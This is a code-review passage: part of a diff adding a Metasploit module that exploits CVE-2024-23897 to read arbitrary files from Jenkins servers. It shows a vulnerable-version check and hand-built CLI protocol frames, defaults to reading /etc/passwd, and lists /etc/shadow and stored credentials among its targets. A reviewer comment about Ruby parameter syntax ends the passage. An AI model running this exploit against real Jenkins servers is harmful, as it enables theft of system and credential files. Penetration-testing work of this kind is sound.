modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb

```diff
@@ -0,0 +1,279 @@
+          * /etc/shadow
+          * Project secrets and credentials
+          * Source code, build artifacts
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Yaniv Nizry', # discovery
+          'binganao', # poc
+          'h4x0r-dz', # poc
+          'Vozec' # poc
+        ],
+        'References' => [
+          [ 'URL', 'https://www.jenkins.io/security/advisory/2024-01-24/'],
+          [ 'URL', 'https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/'],
+          [ 'URL', 'https://github.com/binganao/CVE-2024-23897'],
+          [ 'URL', 'https://github.com/h4x0r-dz/CVE-2024-23897'],
+          [ 'URL', 'https://github.com/Vozec/CVE-2024-23897'],
+          [ 'CVE', '2024-23897']
+        ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2024-01-24',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ ],
+          'SideEffects' => [ ]
+        },
+        'DefaultOptions' => {
+          'RPORT' => 8080,
+          'HttpClientTimeout' => 3 # very quick response, so set this low
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
+        OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
+      ]
+    )
+    register_advanced_options(
+      [
+        OptFloat.new('DELAY', [true, 'Delay between first and second request', 0.5]),
+        OptString.new('ENCODING', [true, 'Encoding to use for reading the file', 'UTF-8']),
+        OptString.new('LOCALITY', [true, 'Locality to use for reading the file', 'en_US'])
+      ]
+    )
+  end
+
+  def check
+    version = jenkins_version
+
+    return Exploit::CheckCode::Safe('Unable to determine Jenkins version number') if version.blank?
+
+    version = Rex::Version.new(version)
+
+    if version <= Rex::Version.new('2.426.2') || # LTS check
+       (version >= Rex::Version.new('2.427') && version <= Rex::Version.new('2.441')) # non-lts
+      return Exploit::CheckCode::Appears("Found exploitable version: #{version}")
+    end
+
+    Exploit::CheckCode::Safe("Found non-exploitable version: #{version}")
+  end
+
+  def request_header
+    "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00"
+  end
+
+  def request_footer
+    data = []
+    data << "\x00\x00\x00\x07\x02\x00"
+    data << [datastore['ENCODING'].length].pack('C') # length of encoding string
+    data << datastore['ENCODING']
+    data << "\x00\x00\x00\x07\x01\x00"
+    data << [datastore['LOCALITY'].length].pack('C') # length of locality string
+    data << datastore['LOCALITY']
+    data << "\x00\x00\x00\x00\x03"
+    data
+  end
+
+  def parameter_one
+    # a literal parameter of 1
+    "\x03\x00\x00\x01\x31\x00\x00\x00"
+  end
+
+  def data_generator(pad: false)
```

Comment:
I believe default method parameters are denoted like this:
```suggestion
  def data_generator(pad =  false)
```
The module was running with the colon in the method definition but `data_generator` wasn't getting called and thus the request body being sent from `upload_request` was empty and the module wasn't executing properly.